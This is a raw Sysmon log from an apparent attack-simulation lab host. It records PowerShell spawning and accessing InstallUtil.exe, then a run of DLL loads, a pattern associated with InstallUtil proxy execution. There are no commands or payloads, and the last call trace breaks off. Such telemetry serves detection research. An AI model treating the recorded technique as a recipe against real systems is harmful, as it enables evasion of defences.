734700x800000000000000057594263Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.151{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057594262Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.151{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\iertutil.dll11.00.14393.4467 (rs1_release.210604-1844)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=1D608361848C3A3AC56488995E8D0BB1,SHA256=D95DE5DBAD08E22CB0CFB9322220E752F16124C15867F7748E4D64795E400EBFtrueMicrosoft WindowsValid 734700x800000000000000057594261Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.151{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=D287E1BC5A148E2BCB482DBD0E925738,SHA256=1C2428AD170165DD8DE960C835D9AAB5B268300A676FE935B177ED5D2607430DtrueMicrosoft WindowsValid 734700x800000000000000057594260Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.151{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\urlmon.dll11.00.14393.4530 (rs1_release.210705-0736)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=B63DBDFEC215CF37259DC4A88ADBD0E7,SHA256=67B02F3DE0AF36E76C2D259CE7833EDA4FE33D935538E8A4C1E7E82130870FC1trueMicrosoft WindowsValid 734700x800000000000000057594257Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.135{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\bcacaaa795f281ac827a1af051d3a051\System.Configuration.Install.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.Install.dllMD5=DF0A266E1C073131336B9597E2543820,SHA256=F1079A19E1C6E19EB1A2BA701A3919A0A0474EDFA579D8F3EC05965ECDF5F6FDfalse-Unavailable 734700x800000000000000057594256Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.135{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll4.8.4380.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.dllMD5=C928B5301D291782935A1342A01F6125,SHA256=945ACD65BDCE2291C3C2D15FD910F6E331570D516D386C53FDFB5EC38BE69125false-Unavailable 734700x800000000000000057594255Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.135{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clrjit.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Just-In-Time CompilerMicrosoft® .NET FrameworkMicrosoft Corporationclrjit.dllMD5=0745D9F1BAC58E47CC87656768304313,SHA256=BBA1936354A9EF269B283FE706A74B73BE39CAF4DD57AB0D1CD06A1C75E260A2trueMicrosoft CorporationValid 734700x800000000000000057594254Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.135{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057594253Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.135{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\474c5d5d840d0a8b1974061ff11f02c2\mscorlib.ni.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft Common Language Runtime Class LibraryMicrosoft® .NET FrameworkMicrosoft Corporationmscorlib.dllMD5=9955B914F307F0142D003E93A3A500BE,SHA256=1247284354586C375597AD8046AAC7F983BAAC74B545B674FB12DB4BAC5C6C01trueMicrosoft CorporationValid 734700x800000000000000057594252Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.135{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=1AF6CD8B7CE4A852F67AA98C71AA1D26,SHA256=EF0DE008500A8C9C7908383AF11AE55845EBBE28C96C013EA720950BA89D3D28trueMicrosoft WindowsValid 734700x800000000000000057594249Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.135{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ucrtbase_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationucrtbase_clr0400.dllMD5=F8F171BE1820544E15B555847005355C,SHA256=CDDF9A2BF085AE59BA464B3BA6394AACFC342DA5F17D77FD5306054C8AABF153trueMicrosoft CorporationValid 734700x800000000000000057594248Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.135{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\vcruntime140_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140_clr0400.dllMD5=63936588122BDEE9624D02CE3F8F54EA,SHA256=21F7E6165CE8DD92DB8CDF48CEE83DE64B2B0807B7B499CF87678B70C6F8C32FtrueMicrosoft CorporationValid 13241300x800000000000000057594247Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:23:45.135{8B6011A9-884A-6164-0100-00000000F101}4SystemHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\CIT\Module\Microsoft.NET/Framework64/v4.0.30319/clr.dll\\Device\HarddiskVolume1\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeQWORD (0x01d7d7ea-0x0bd2126f) 734700x800000000000000057594245Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.135{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Common Language Runtime - WorkStationMicrosoft® .NET FrameworkMicrosoft Corporationclr.dllMD5=1AF77AF533C702978D4C91C31DB1CCE5,SHA256=39AB2B2B034E3210D866FCF8649EB84C28E3DAB7CB7FA7C986346C6A9ED22D0AtrueMicrosoft CorporationValid 734700x800000000000000057594244Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.119{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValid 734700x800000000000000057594243Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.119{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057594242Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.119{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValid 734700x800000000000000057594241Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.119{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057594240Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.119{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057594239Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.119{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057594238Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.119{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057594237Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.119{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057594236Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.119{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057594235Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.119{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057594234Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.119{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValid 734700x800000000000000057594232Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.119{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll4.8.4180.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Execution EngineMicrosoft® .NET FrameworkMicrosoft Corporationmscoreei.dllMD5=899A8B655E52A061B33571D97C5C06ED,SHA256=DE05B03E37FB9BA5D74CF8FA36A6F0B15AB61705285B738BC90D14FDE580A45EtrueMicrosoft CorporationValid 734700x800000000000000057594230Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.119{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057594229Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.119{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057594228Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.119{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057594227Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.119{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057594226Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.119{8B6011A9-C6FA-616E-9C35-01000000F101}41365516C:\Windows\system32\conhost.exe{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057594225Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.119{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057594224Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.119{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057594223Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.119{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\mscoree.dll10.0.14393.0 (rs1_release.160715-1616)Microsoft .NET Runtime Execution EngineMicrosoft® Windows® Operating SystemMicrosoft Corporationmscoree.dllMD5=5ECE402D7E12EC3750D044BF3D878DF6,SHA256=3F02B1AE7B61BC36B04EA2B82ED79F112219F4E9668518030FF14B005E2C9BBCtrueMicrosoft WindowsValid 734700x800000000000000057594222Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.119{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057594221Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.119{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe4.8.3761.0 built by: NET48REL1.NET Framework installation utilityMicrosoft® .NET FrameworkMicrosoft CorporationInstallUtil.exeMD5=4F296B709C187304D4609C11FD2BDC03,SHA256=756E583FF1E00A5DB0A2BEE3849693920C4BDFBE87D8757834093372CD690C71trueMicrosoft CorporationValid 10341000x800000000000000057594220Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.119{8B6011A9-A320-618E-85FC-04000000F101}26405252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c01f5|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffff(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4572a0a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4572871(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45fb9a2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+456aaf7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+503b379(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+453009f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4593b11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45759b1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45666d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45a2d74(wow64) 10341000x800000000000000057594219Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:23:45.119{8B6011A9-A320-618E-85FC-04000000F101}26405252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8B6011A9-A321-618E-8AFC-04000000F101}9928C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\2a6ccbaba5690e5b3fec3bf707022bdb\System.ni.dll+2c3566|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\9acccfc2a758c682d6a8c44451f5ccfd\Microsoft.PowerShell.Commands.Management.ni.dll+ffffffff(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4572a0a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4572871(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+45fb9a2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+456aaf7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+503b379(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+453009f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4593b11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll+4575b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\0784610d68cd6b36e46150702bf69c35\System.Management.Automation.ni.dll